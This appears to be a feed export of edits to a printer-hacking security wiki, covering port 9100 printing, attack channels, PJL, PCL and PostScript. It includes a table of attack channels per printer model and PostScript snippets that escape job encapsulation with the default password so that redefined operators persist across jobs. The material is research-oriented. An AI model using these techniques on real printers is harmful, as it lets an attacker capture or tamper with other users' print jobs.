Raw printing is what we define as the process of making a connection to port 9100/tcp of a network printer – a functionality which was originally introduced by HP in the early 90s using separate hardware modules. It is the default method used by ''CUPS'' and the ''Windows printing architecture'' &amp;lt;ref&amp;gt;''[https://msdn.microsoft.com/windows/hardware/drivers/print/printer-driver-architecture Windows Printer Driver Architecture]'', Microsoft Corporation&amp;lt;/ref&amp;gt; to communicate with network printers as it is considered `the simplest, fastest, and generally the most reliable network protocol used for printers' &amp;lt;ref&amp;gt;''[https://www.cups.org/doc/network.html#PROTOCOLS Network Protocols supported by CUPS – AppSocket Protocol]'', M. Sweet&amp;lt;/ref&amp;gt;. Raw port 9100 printing, also referred to as ''JetDirect'', ''AppSocket'' or ''PDL-datastream'', actually is not a printing protocol by itself. Instead, all data sent is directly processed by the printing device, just like a parallel connection over TCP. In contrast to [[LPD]], [[IPP]] and [[SMB]], interpreted [[Fundamentals#Printer Control Languages|printer control]] or [[Fundamentals#Page Description Languages|page description]] languages can send direct feedback to the client, including status and error messages. Such a '''bidirectional channel''' is not only perfect for debugging, but gives us direct access to results of PJL, PostScript or PCL commands, for example for [[information disclosure]] attacks. Therefore raw port 9100 printing – which is supported by almost any network printer – is used as the channel for security analysis with [[PRET]] and [[PFT]].&lt;br /&gt;
&lt;br /&gt;
=== Who would put a printer on the Internet? ===&lt;br /&gt;
&lt;br /&gt;
Obviously, a port 9100 based attack requires IP packets to be routed from the attacker to the printer device and back, but printers usually are not directly connected to the Internet &amp;lt;ref&amp;gt;It however must be noted that in many educational institutions it is common even today to assign a public IP address to all networked devices including printers.&amp;lt;/ref&amp;gt;. As of July 2016, the Shodan search engine categorizes only 31.264 '''Internet-accessible''' devices as printers as shown below:&lt;br /&gt;
&lt;br /&gt;
[[File:Shodan.png|border|Printers reachable directly via the Internet]]&lt;br /&gt;
&lt;br /&gt;
Attacking intranet printers however may also be attractive to an '''insider'''. Imagine an employee who has motivation to obtain the department manager's payroll print job from a shared device. It is also worth mentioning that many new printers bring their own '''wireless access point''' – unencrypted by default to allow easy printing, for example via ''AirPrint'' &amp;lt;ref&amp;gt;''[https://support.apple.com/en-us/HT201311 About AirPrint]'', Apple Inc&amp;lt;/ref&amp;gt; compatible mobile apps. While connecting to a printer through Wi-Fi requires the attacker to stay physically close to the device, it may be feasible to perform her attack from outside of the targeted institution depending on the signal strength.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]], [[PRET]], [[PFT]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=USB_drive_or_cable&amp;diff=302</id>
		<title>USB drive or cable</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=USB_drive_or_cable&amp;diff=302"/>
				<updated>2017-01-31T08:01:34Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:USB-deployment-channel.png|thumb|160px|Printing over USB]]&lt;br /&gt;
&lt;br /&gt;
Data can be sent to and received from a local printer by [https://en.wikipedia.org/wiki/USB USB] or [https://en.wikipedia.org/wiki/IEEE_1284 parallel] cables. Both channels are supported by [[PRET]] to communicate with the device. In addition, printers and MFPs often ship with ''Type-A'' USB ports which allow users to print directly from a USB drive. While plugged-in USB drives do not offer a bidirectional channel, their usage in a crowded copy room may seem less conspicuous. Obviously, exploiting USB printers requires the attacker to gain physical access to the device. However, it is not completely unrealistic for most institutions and companies. Gaining physical access to a printer can generally be considered as less hard than it is for other network components like servers or workstations. This is because printers are usually shared by and accessible to a whole department. Sneaking into an unlocked copy room and launching a malicious print job from a USB stick is only a matter of seconds. Further real-world scenarios include copy shops or publicly available printers at schools and universities. &amp;lt;!-- and for PostScript based [[information disclosure]] attacks, the result can simply be leaked by printing it on paper --&amp;gt; &amp;lt;!-- smart card based access control --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'' '''Is your copy room always locked?''' ''&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#High-level_overview|Fundamentals]], [[Attack carriers]]&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Attack_carriers&amp;diff=301</id>
		<title>Attack carriers</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Attack_carriers&amp;diff=301"/>
				<updated>2017-01-31T08:00:26Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:Deployment-channels.png|thumb|Overview of channels to deploy a (malicious) print job]]&lt;br /&gt;
&lt;br /&gt;
Various channels like [[USB]], [[LPD]], [[IPP]], [[SMB]], or [[raw]] port 9100 printing can be used as carriers to deploy malicious print jobs. While it is possible to attack the [[Fundamentals#Network_printing_protocols|printing protocols]] themselves, most attacks discussed in this wiki target the [[PostScript]] and [[PJL]] interpreters. The payload is just routed by any of the printing channels. This is important to note because it means '''whenever the attacker can somehow ‘print’ she can attack and exploit those interpreters'''.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Printing-overview.png|400px|Attack the interpreters, not the printing channels]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
This fact makes it much harder for the blue team ([[Countermeasures#Admins|network administrators]], for example) to defend against printer attacks. Many devices even allow printing (and therefore exploitation) by uploading a raw file to the printer's [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] service or to a form on the embedded web server. To get an impression, an overview of printing channels supported by various printer models is given below.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align:center&amp;quot;&lt;br /&gt;
|+ Malicious print job deployment channels&lt;br /&gt;
|-&lt;br /&gt;
! Printer model             !! LPD !! IPP !! Raw !! Web !! FTP !! SMB !! USB&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 1200          ||  ✔  ||     ||  ✔  ||     ||     ||     ||&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 4200N         ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     ||&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 4250N         ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet P2015dn       ||  ✔  ||     ||  ✔  ||     ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet M2727nfs      ||  ✔  ||     ||  ✔  ||     ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP LaserJet 3392 AiO      ||  ✔  ||     ||  ✔  ||     ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | HP Color LaserJet CP1515n ||  ✔  ||     ||  ✔  ||     ||     ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Brother MFC-9120CN        ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Brother DCP-9045CDN       ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Lexmark X264dn            ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Lexmark E360dn            ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Lexmark C736dn            ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Dell 5130cdn              ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Dell 1720n                ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Dell 3110cn               ||  ✔  ||     ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Kyocera FS-C5200DN        ||  ✔  ||     ||  ✔  ||     ||  ✔  ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Samsung CLX-3305W         ||  ✔  ||  ✔  ||  ✔  ||     ||     ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Samsung MultiPress 6345N  ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||     ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Konica bizhub 20p         ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  ||     || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | OKI MC342dn               ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align:left;&amp;quot; | Konica bizhub C454e       ||  ✔  ||  ✔  ||  ✔  ||  ✔  ||     ||  ✔  || ✔&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
It must be noted that these are not the only possible attack scenarios. For example using social engineering to make a victim print a malicious document is not even covered in this wiki yet – neither are new methods to deploy (potentially malicious) print jobs like cloud-based printing.&lt;br /&gt;
&lt;br /&gt;
== Attacker Models ==&lt;br /&gt;
&lt;br /&gt;
A '''physical attacker''' has the capability to print documents from USB stick or via USB/parallel cable. A (wired or wireless) attacker connecting through a '''TCP/IP network''' can deploy print jobs over LPD, IPP, port 9100/tcp, FTP, SMB and the embedded web server. Under the assumption that no strong user authentication like smart card based access control or SSL client certificates is enforced, both attacker models do obviously have a channel to print which is the precondition for further attacks to be carried out. Both are certainly quite strong attacker models because they require direct access – either physical or logical – to the device. However, in penetration testing scenarios where sneaking into the building is not an option and the printer is not directly reachable over the internet, other deployment channels are required. In such cases, the '''victim's web browser''' can be used as a carrier for printer malware as discussed in [[cross-site printing]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[USB drive or cable]], [[Port 9100 printing]], [[Cross-site printing]]&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=PJL&amp;diff=300</id>
		<title>PJL</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=PJL&amp;diff=300"/>
				<updated>2017-01-31T07:52:47Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:PJL-display.png|thumb|Classic prank: PJL display ‘hacks’]]&lt;br /&gt;
&lt;br /&gt;
The Printer Job Language (PJL) was originally introduced by HP but soon became a de facto standard for print job control. ‘PJL resides above other printer languages’ &amp;lt;ref&amp;gt;''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, p. 1&amp;lt;/ref&amp;gt; and can be used to change settings like paper tray or size. It must however be pointed out that PJL is not limited to the current print job as some settings can be made permanent. PJL can also be used to change the printer's display or read/write files on the device. There are many dialects as vendors tend to support only a subset of the commands listed in the PJL reference and instead prefer to add proprietary ones. PJL is further used to set the file format of the actual print data to follow. Without such explicit language switching, the printer has to identify the page description language based on magic numbers. Typical PJL commands to set the paper size and the number of copies before switching the interpreter to PostScript mode are shown below:&lt;br /&gt;
&lt;br /&gt;
 @PJL SET PAPER=A4&lt;br /&gt;
 @PJL SET COPIES=10&lt;br /&gt;
 @PJL ENTER LANGUAGE=POSTSCRIPT&lt;br /&gt;
&lt;br /&gt;
PJL can be used for various attacks such as [[denial of service]], manipulating hardware [[Accounting bypass#Hardware_page_counters|page counters]], gaining access to the printer's [[Memory access|memory]] and [[File system access|file system]] as well as malicious [[firmware updates]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Printer Control Languages]], [[Denial of service]], [[Accounting bypass]], [[Memory access]], [[File system access]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
------------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=PCL&amp;diff=299</id>
		<title>PCL</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=PCL&amp;diff=299"/>
				<updated>2017-01-31T07:51:32Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The Printer Command Language (PCL) as specified in &amp;lt;ref&amp;gt;''[http://www.hp.com/ctg/Manual/bpl13210.pdf PCL5 Printer Language Technical Reference Manual]'', HP Inc., 1992&amp;lt;/ref&amp;gt; is a minimalist page description language supported by a wide variety of vendors and devices. Along with [[PostScript]], PCL represents a de facto standard printer language. Similar to PostScript, its origins date back to the early 80s with PCL 1 introduced by HP in 1984 for inkjet printers. PCL 3 and PCL 4 added support for fonts and macros which both can be permanently downloaded to the device – however only referenced by a numeric id, not by a file name, as direct access to the file system is not intended. PCL 1 to 5 consist of escape sequences followed by one or more ASCII characters representing a command to be interpreted. PCL 6 Enhanced or ‘PCL XL’ uses a binary encoded, object-oriented protocol &amp;lt;ref&amp;gt;''[http://www.undocprint.org/_media/formats/page_description_languages/pcl_xl_2_0_technical_reference_rev2_2.pdf PCL XL Feature Reference Protocol Class 2.0]'', HP Inc., 2000&amp;lt;/ref&amp;gt;. If not stated otherwise, traditional PCL 5e is used in this work. An example PCL document to print ‘Hello world’ is given below:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;Esc&amp;gt;EHello world&lt;br /&gt;
&lt;br /&gt;
Due to its limited capabilities, PCL is hard to exploit from a security perspective unless one discovers interesting proprietary commands in some printer manufacturer's PCL flavour. The [[PRET]] tool implements a '''virtual, PCL-based file system''' which uses macros to save file content and metadata in the printer's memory. This hack shows that even a device which supports only minimalist page description languages like PCL can be used to store arbitrary files like copyright infringing material. Although turning a printer into a file sharing service is not a security vulnerability per se, it may apply as ‘misuse of service’ depending on the corporate policy.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[File system access]], [[PostScript]], [[PJL]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=PDF&amp;diff=298</id>
		<title>PDF</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=PDF&amp;diff=298"/>
				<updated>2017-01-31T07:50:37Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The Portable Document Format (PDF) was initially released by Adobe Systems in 1993 &amp;lt;ref&amp;gt;''[http://www.adobe.com/devnet/pdf/pdf_reference.html PDF Reference and Adobe Extensions to the PDF Specification]'', Adobe Systems Inc.&amp;lt;/ref&amp;gt; and later became an ISO standard &amp;lt;ref&amp;gt;''ISO 32000-1:2008, Document Management – Portable Document Format, Part 1: PDF 1.7'', International Organization for Standardization, 2008&amp;lt;/ref&amp;gt;. It was designed as a successor of PostScript and has established itself as a widely accepted document exchange format. Some newer printers support direct PDF printing in addition to PostScript. While PDF is partially based on PostScript, it is neither a complete programming language, nor does it support file system operations. Therefore PDF seems less applicable for printer exploitation and is not further studied in this wiki.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[PostScript]], [[PJL]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=PostScript&amp;diff=297</id>
		<title>PostScript</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=PostScript&amp;diff=297"/>
				<updated>2017-01-31T07:47:21Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Operator redefinition */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;The PostScript (PS) language was invented by Adobe Systems between 1982 and 1984. It has been standardized as PostScript Level 1 &amp;lt;ref&amp;gt;''PostScript Language Reference Manual'', Adobe Systems Inc., 1985&amp;lt;/ref&amp;gt;, PostScript Level 2 &amp;lt;ref&amp;gt;''[https://www-cdf.fnal.gov/offline/PostScript/PLRM2.pdf PostScript Language Reference Manual, 2nd Edition]'', Adobe Systems Inc., 1992&amp;lt;/ref&amp;gt;, PostScript 3 &amp;lt;ref&amp;gt;''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999&amp;lt;/ref&amp;gt; and in various language supplements. While PostScript has lost popularity in desktop publishing and as a document exchange format to [[PDF]], it is still the preferred page description language for laser printers. The term ‘page description’ may be misleading though, as PostScript is capable of much more than just creating vector graphics. PostScript is a stack-based, Turing-complete programming language consisting of almost 400 operators for arithmetic, stack and graphic manipulation and various data types such as arrays or dictionaries. Technically speaking, access to a PostScript interpreter can already be classified as code execution because any algorithmic function can theoretically be implemented in PostScript. Certainly, without access to the network stack or additional operating system libraries, possibilities are limited to arbitrary mathematical calculations like mining bitcoins. However, PostScript is capable of basic file system I/O to store frequently used code, graphics or font files. Originally designed as a feature, the dangers of such functionality were limited before printers got interconnected and risks were mainly discussed in the context of host-based PostScript interpreters.
In this regard, Encapsulated PostScript (EPS) is also noteworthy as it can be included in other file formats to be interpreted on the host such as [https://en.wikipedia.org/wiki/LaTeX LaTeX] documents. Like [[PJL]] and [[PCL]], PostScript supports bidirectional communication between host and printer. Example PostScript code to echo ''Hello world'' to ''stdout'' is given below:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
%!&lt;br /&gt;
(Hello world) print&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
While most printer manufacturers have implemented (as hardware modules or in software) and licensed original ‘Adobe PostScript’, Brother and Kyocera use their own PostScript clones: '''Br-Script''' and '''KPDL'''. Such flavours of the PostScript language are not 100% compatible, especially concerning security features like exiting the server loop. PostScript can be used for a variety of attacks such as [[denial of service]] (for example, through infinite loops), print job [[Print job manipulation|manipulation]] and [[Print job retention|retention]] as well as gaining access to the printer's [[File system access|file system]].&lt;br /&gt;
&lt;br /&gt;
== Security features ==&lt;br /&gt;
&lt;br /&gt;
=== Exiting the server loop ===&lt;br /&gt;
&lt;br /&gt;
Normally, each print job is encapsulated in its own, separate environment. One interesting feature of PostScript is that a program can circumvent print job encapsulation and alter the initial VM for subsequent jobs &amp;lt;ref&amp;gt;''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 68-72&amp;lt;/ref&amp;gt;. To do so, it can use either ''startjob'', a Level 2 feature:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
true 0 startjob&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
or ''exitserver'' (available in all implementations that include a job server):&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=postscript&amp;gt;&lt;br /&gt;
serverdict begin 0 exitserver&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This capability is controlled by the ''StartJobPassword'' which defaults to &amp;lt;code&amp;gt;0&amp;lt;/code&amp;gt; (compare [[Credential disclosure#PostScript|credential disclosure]]). Since the job server loop is generally responsible for cleaning up the state of the interpreter between jobs, any changes that are made outside the server loop will remain as part of the permanent state of the interpreter for all subsequent jobs &amp;lt;ref&amp;gt;''[https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (Green Book),]'', Adobe Systems Inc., 1988, p. 176&amp;lt;/ref&amp;gt;. In other words, a print job can access and alter further jobs. Bingo!&lt;br /&gt;
&lt;br /&gt;
=== Operator redefinition ===&lt;br /&gt;
&lt;br /&gt;
When a PostScript document calls an operator, the first version found on the dictionary stack is used. Operators usually reside in the ''systemdict'' dictionary, however by placing a new version into the ''userdict'' dictionary, operators can be practically overwritten because the user-defined version is the first one found on the dictionary stack. Using the ''startjob''/''exitserver'' operators, such changes can be made permanent – at least until the printer is restarted. A scheme of the PostScript dictionary stack is given below:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Dictstack.png|300px|The PostScript dictionary stack]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The potential impact of redefining operators is only limited by creativity. When further legitimate documents are printed and call a redefined operator, the attacker's version will be executed. This can lead to various attacks such as [[Document processing#Showpage redefinition|denial of service]], print job [[Print job retention|retention]] and [[Print job manipulation|manipulation]]. Note however that this is not necessarily a security bug, but a 32-year-old language feature, available in almost any PostScript printer and [https://en.wikipedia.org/wiki/Raster_image_processor RIP].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[Fundamentals#Printer Control Languages|Page Description Languages]], [[Denial of service]], [[Print job manipulation]], [[Print job retention]], [[File system access]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- what about Configurable PostScript Interpreter (CPSI) technology? --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-----&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Fundamentals&amp;diff=296</id>
		<title>Fundamentals</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Fundamentals&amp;diff=296"/>
				<updated>2017-01-31T07:43:29Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Page Description Languages */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant &amp;lt;ref&amp;gt;Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.&amp;lt;/ref&amp;gt;. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages.&lt;br /&gt;
&lt;br /&gt;
== High-level overview ==&lt;br /&gt;
&lt;br /&gt;
Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Protocols.png|500px|Encapsulation of printer languages]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The network printing protocol acts as a channel to deploy print jobs which either contain the page description language directly or first invoke a printer/job control language to change settings like paper trays. From a security point of view this encapsulation is interesting, especially because functionality is overlapping. For example an – each time different – username can be set in [[IPP]], [[PJL]] and [[PostScript]]. If something is restricted in one layer, it may be allowed in the next one. While network printing protocols are discussed in this wiki, the focus is mainly on printer languages, particularly PJL and PostScript.&lt;br /&gt;
&lt;br /&gt;
== Network printing protocols ==&lt;br /&gt;
&lt;br /&gt;
Sending data to a printer device can be done by [[USB_drive_or_cable|USB]]/parallel cable or over a network. This wiki focuses on network printing but most of the presented attacks can also be performed against local printers. There are various exotic protocols for network printing like Novell's [https://en.wikipedia.org/wiki/NetWare_Core_Protocol NCP] or [https://en.wikipedia.org/wiki/AppleTalk AppleTalk]. In the Windows world, [[SMB]]/CIFS printer shares have become quite popular. Furthermore, some devices support printing over generic protocols such as [https://en.wikipedia.org/wiki/File_Transfer_Protocol FTP] or [https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol HTTP] file uploads. The most common printing protocols supported directly by network printers however are [[LPD]], [[IPP]], and [[Raw|raw port 9100]] printing. Network printing protocols can be attacked directly, for example by exploiting a [[Buffer overflows#LPD daemon|buffer overflow]] in the printer's LPD daemon. In many attack scenarios however, they only act as a '''carrier/channel''' to deploy malicious [[Printer language]] code. Note that a network printer usually supports multiple protocols to ‘print’ a document which broadens the attack surface.&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[LPD]], [[IPP]], [[Raw]], [[SMB]]&lt;br /&gt;
&lt;br /&gt;
== Printer Control Languages ==&lt;br /&gt;
&lt;br /&gt;
A job control language manages settings like output trays for the current print job. While it usually sits as an optional layer in-between the printing protocol and the page description language, functions may be overlapping. Examples of vendor-specific job control languages are [http://www.undocprint.org/formats/printer_control_languages/cpca CPCA], [http://www.undocprint.org/formats/printer_control_languages/xjcl XJCL], [http://www.undocprint.org/formats/printer_control_languages/ejl EJL] and [[PJL]] – which is supported by a variety of printers and will be discussed below. In addition, printer control and management languages are designed to affect not only a single print job but the device as a whole. One approach to define a common standard for this task was [http://www.undocprint.org/formats/printer_control_languages/npap NPAP]. However, it has not established itself and is only supported by Lexmark. Other printer manufacturers instead use [[SNMP]] or its PJL-based metalanguage [[PML]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PJL]], [[PML]], [[SNMP]], [[UEL]]&lt;br /&gt;
&lt;br /&gt;
== Page Description Languages ==&lt;br /&gt;
&lt;br /&gt;
A page description language (PDL) specifies the appearance of the actual document. It must however be pointed out that some PDLs offer limited job control, so a clear demarcation between page description and printer/job control language is not always possible. The function of a ‘printer driver’ is to translate the file to be printed into a PDL that is understood by the printer model. Note that some low cost inkjet printers do not support any high level page description language at all. So called host-based or [https://en.wikipedia.org/wiki/Graphics_Device_Interface#GDI_printers GDI] printers only accept simple bitmap datastreams like [http://www.undocprint.org/formats/page_description_languages/zjstream ZJS] while the actual rendering is done by the printer driver. There are various proprietary page description languages like Kyocera's [http://www.undocprint.org/formats/page_description_languages/prescribe PRESCRIBE], [http://www.undocprint.org/formats/page_description_languages/spl SPL], [http://www.undocprint.org/formats/page_description_languages/xes XES], [http://www.undocprint.org/formats/page_description_languages/capsl CaPSL], [http://www.undocprint.org/formats/page_description_languages/rpcs RPCS], [https://en.wikipedia.org/wiki/ESC/P ESC/P] which is mostly used in dot matrix printers or [https://en.wikipedia.org/wiki/HPGL HP-GL] and [https://en.wikipedia.org/wiki/HPGL#HP-GL.2F2 HP-GL/2] which have been designed for plotters. Support for direct [https://en.wikipedia.org/wiki/Portable_Document_Format PDF] and [https://en.wikipedia.org/wiki/Open_XML_Paper_Specification XPS] printing is also common on newer printers. The most common ‘standard’ page description languages however are [[PostScript]] and [[PCL]].&lt;br /&gt;
&lt;br /&gt;
→ ''Related articles:'' [[PCL]], [[PostScript]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------&lt;/div&gt;</summary>
		<author><name>84.153.135.37</name></author>	</entry>

	<entry>
		<id>http://hacking-printers.net/wiki/index.php?title=Fundamentals&amp;diff=295</id>
		<title>Fundamentals</title>
		<link rel="alternate" type="text/html" href="http://hacking-printers.net/wiki/index.php?title=Fundamentals&amp;diff=295"/>
				<updated>2017-01-31T07:43:20Z</updated>
		
		<summary type="html">&lt;p&gt;84.153.135.37: /* Printer Control Languages */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Typical printers range from classical [https://en.wikipedia.org/wiki/Dot_matrix_printing dot matrix] to [https://en.wikipedia.org/wiki/Inkjet_printing inkjet] or [https://en.wikipedia.org/wiki/Laser_printing laser] printers used at home or in corporate environments. The printing '''hardware''' is not addressed in detail in this wiki as from a security perspective it seems less relevant &amp;lt;ref&amp;gt;Even though some newspapers claimed hackers could set laser printers on fire by [http://www.wired.com/2011/12/hp-printer-lawsuit/ overheating] them.&amp;lt;/ref&amp;gt;. This page aims to give an introduction to fundamental '''software''' printing technologies, including network printing protocols, printer control and page description languages.&lt;br /&gt;
&lt;br /&gt;
== High-level overview ==&lt;br /&gt;
&lt;br /&gt;
Sending a document to a network printer may involve various protocols and languages. A schematic relationship regarding the encapsulation of printer languages is given below.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Protocols.png|500px|Encapsulation of printer languages]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
